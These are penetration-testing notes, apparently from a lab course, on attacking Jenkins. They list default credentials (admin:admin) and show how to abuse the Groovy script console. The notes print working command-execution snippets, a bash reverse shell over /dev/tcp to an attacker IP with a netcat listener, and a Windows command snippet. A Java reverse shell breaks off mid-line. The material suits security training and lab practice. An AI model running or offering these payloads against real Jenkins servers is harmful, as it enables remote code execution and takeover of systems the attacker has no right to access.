Jenkins Attacks

Jenkins runs on Tomcat port 8080 by default.
- It also utilizes port 5000 to attach slave servers.
  - This port is used to communicate between masters and slaves
Jenkins can use a local database, LDAP, Unix user database, delegate security to a servlet container, or use no authentication at all
- Administrators can also allow or disallow users from creating accounts.
- default credentials
  - admin:admin

Script Console

The script console can be reached at the URL http://jenkins.inlanefreight.local:8000/script
- This console allows a user to run Apache Groovy scripts, which are an object-oriented Java-compatible language
- For example, we can use the following snippet to run the id command.

def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

http://jenkins.inlanefreight.local:8000/script

There are various ways that access to the script console can be leveraged to gain a reverse shell.
- For example, using the command below, or this Metasploit module.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

nc -lvnp 8443

Against a Windows host, we could attempt to add a user and connect to the host via RDP or WinRM or, to avoid making a change to the system, use a PowerShell download cradle with Invoke-PowerShellTcp.ps1.
We could run commands on a Windows-based Jenkins install using this snippet:

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}")

We could also use this Java reverse shell to gain command execution on a Windows host, swapping out localhost and the port for our IP address and listener port.

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(h

PreviousTomcat Attacks NextSplunk Attacks

Last updated 1 year ago